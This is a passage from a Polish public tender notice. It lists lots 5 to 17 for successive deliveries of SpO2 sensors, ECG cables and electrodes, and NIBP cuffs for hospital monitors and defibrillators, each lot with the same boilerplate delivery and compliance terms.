Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my EMTEL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my EMTEL (wielorazowy czujnik SpO2 na palec typu klips dla dorosłych, wielorazowy czujnik SpO2 typ Y dla dzieci, klips do wielorazowego czujnika SpO2 na ucho dla dzieci, kable połączeniowe do czujników SpO2, kabel główny EKG z 3 odprowadzeń, zestaw 3 odprowadzeń pacjenta do monitorowania przebiegu EKG typ krokodylki, wielorazowy mankiet NIBP  dla dorosłych do kardiomonitorów, wielorazowy mankiet NIBP dla dzieci do kardiomonitorów).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (5) str. 33-35 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my SpaceLabs.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my SpaceLabs (wielorazowy czujnik SpO2 na palec dla dorosłych, kabel (adapter) połączeniowy czujnika SpO2 kardiomonitora, kabel połączeniowy do monitorowania przebiegu EKG z 3 odprowadzeń, zestaw 3 odprowadzeń pacjenta do monitorowania przebiegu EKG typ krokodylki, wielorazowy mankiet NIBP  dla dorosłych do kardiomonitorów).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (6) str. 36 SIWZ. 
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Medlab.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Medlab (wielorazowy czujnik SpO2 na palec dla dorosłych, kable połączeniowe do czujników SpO2). 
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (7) str. 37 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Nellcor.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Nellcor (wielorazowy czujnik SpO2 na palec dla dorosłych, kable połączeniowe do czujników SpO2).          
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (8) str. 38 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Nonin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Nonin (wielorazowy czujnik SpO2 na palec dla dorosłych).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (9) str. 39 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do defibrylatorów Lifepak 20 i 20e.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do defibrylatorów Lifepak 20 i 20e (wielorazowy czujnik SpO2 na palec typu klips dla dorosłych, kabel do monitorowania przebiegu EKG z 12 odprowadzeń, kabel do monitorowania przebiegu EKG z 3 odprowadzeń, kable połączeniowe do czujników SpO2).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (10) str. 40 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my TRIDENT MED. s.c. Warszawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my TRIDENT MED. s.c. Warszawa (wielorazowy czujnik SpO2 na palec dla dorosłych).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (11) str. 41 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my S&W Medico Technik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my S&W Medico Technik ( kabel połączeniowy do monitorowania przebiegu EKG z 3 odprowadzeń, zestaw 3 odprowadzeń pacjenta do monitorowania przebiegu EKG typ krokodylki).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (12) str. 42 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my ASPEL S.A..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my ASPEL S.A. (kabel główny pacjenta do zapisu badania EKG).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (13) str. 43 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my FARUM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my FARUM (kabel główny pacjenta do pomiaru EKG).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (14) str. 44 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my HELIGE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my HELIGE (kabel główny pacjenta do pomiaru EKG).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (15) str. 45 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Sukcesywne dostawy elektrod do zapisu EKG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy elektrod do zapisu EKG (elektrody kończynowe dla dorosłych, elektrody kończynowe dla dzieci, elektrody przedsercowe dla dorosłych, elektrody przedsercowe dla dzieci).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (16) str. 46 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Sukcesywne dostawy akcesoriów aparatów do pomiaru NIBP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesoriów aparatów do pomiaru NIBP (wielorazowy mankiet kompletny NIBP dla dorosłych z 2 wężykami, wielorazowy mankiet kompletny NIBP dla dorosłych z 1 wężykiem, wielorazowy mankiet kompletny NIBP dla dzieci,pompka kompletna do aparatów do pomiaru ciśnienia tętniczego (nieinwazyjnego)).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (17) str. 47 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
